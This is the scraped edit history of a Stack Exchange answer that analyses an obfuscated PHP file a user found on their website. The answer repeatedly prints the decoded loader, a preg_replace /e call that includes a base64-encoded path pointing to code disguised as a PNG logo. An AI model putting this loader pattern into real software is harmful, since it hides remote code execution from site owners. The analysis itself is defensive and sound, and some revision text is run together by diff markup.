Revisions to Found suspicious, obfuscated PHP file. Is this a hack attempt on my website? [duplicate]

This is primarily in English.

edited Feb 17, 2016 at 19:14

22.6k
8
77
91

It seems this code offuscates the following codeby using the XOR XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? There seems to be a security problem that allows code execution but it could be just for code obfuscation.

It seems this code offuscates the following codeby using the XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? There seems to be a security problem that allows code execution but it could be just for code obfuscation.

It seems this code offuscates the following codeby using the XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? There seems to be a security problem that allows code execution but it could be just for code obfuscation.

added 38 characters in body

Source Link

edited Feb 17, 2016 at 19:11

borjab

339
1
8

It seems this code offuscates the following codeby using the XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? ItThere seems to be a security problem, as that allows code execution but it could allowbe just for code executionobfuscation.

It seems this code offuscates the following codeby using the XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? It seems to be a security problem, as it could allow code execution.

It seems this code offuscates the following codeby using the XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? There seems to be a security problem that allows code execution but it could be just for code obfuscation.

added 138 characters in body

Source Link

edited Feb 17, 2016 at 18:56

borjab

339
1
8

It seems this code creates thisoffuscates the following codeby using the XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? It seems to be a security problem, as it could allow code execution.

It seems this code creates this:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? It seems to be a security problem, as it could allow code execution.

It seems this code offuscates the following codeby using the XOR operator on two Strings as binaries:

<?php preg_replace("#(.+)#ie", "@include_once(base64_decode("\1"));", "L2hvbWU0L21pdHp2YWhjL3B1YmxpY19odG1sL2Fzc2V0cy9pbWcvbG9nb19zbWFsbC5wbmc"; ?>

You can test it in a PHP sandbox. The large string generated above is a base64 encoded string:

/home4/mitzvahc/public_html/assets/img/logo_small.png

Why is it using preg_replace? It seems to be a security problem, as it could allow code execution.

deleted 6 characters in body

Source Link

edited Feb 17, 2016 at 18:32

Mark Buffalo

22.6k
8
77
91

Loading

Source Link

answered Feb 17, 2016 at 18:30

borjab

339
1
8

Loading

Stack Exchange Network

Return to Answer